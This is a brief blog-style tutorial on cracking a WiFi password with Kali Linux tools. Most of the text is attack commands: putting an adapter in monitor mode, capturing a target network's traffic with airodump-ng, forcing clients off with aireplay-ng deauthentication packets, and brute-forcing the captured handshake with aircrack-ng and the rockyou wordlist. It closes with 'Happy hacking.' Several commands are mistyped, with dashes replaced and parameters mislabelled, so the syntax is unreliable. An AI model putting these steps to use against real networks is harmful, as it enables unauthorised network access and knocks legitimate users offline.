Hello friends in this tutorial we are going to learn how we to crack a WiFi password
Note: for this tutorial we need wireless WiFi adapter with monitor mode
Tools
Kali Linux
Wireless WiFi adapter with monitor mode
Steps
- First of all copy the rockyou text file present in the usr/share/wordlists/rockyou.txt.gz (By default will be present in the Kali Linux)
2. Enable Monitor mode
Type airmon-ng to see the list of WiFi adapter
Enable monitor mode by typing airmon-ng start <wificardname>


Type airodump-ng <wificardname>


In this example we are going to choose ‘test’ network to attack
Type airodump –ng -c <channel of the wifi> –write<filelocation>/filename –bssid <id of the WiFi><interface>


This will display the all client that connected to the WiFi
Open another terminal window
Type aireplay-ng –deauth 5 –a <ssid> <wifiname>

To crack the password type:
sudo aircrack-ng –a2 –b <ssid> -w /root/Desktop/rockyou.txt /root/Desktop/hack-01.cap

For the simplicity of this tutorial, I had the WiFi password as ‘password’ for educational purpose and so that it can be easily cracked. The process of cracking password may take much more time depending on the complexity of the network password.
Happy hacking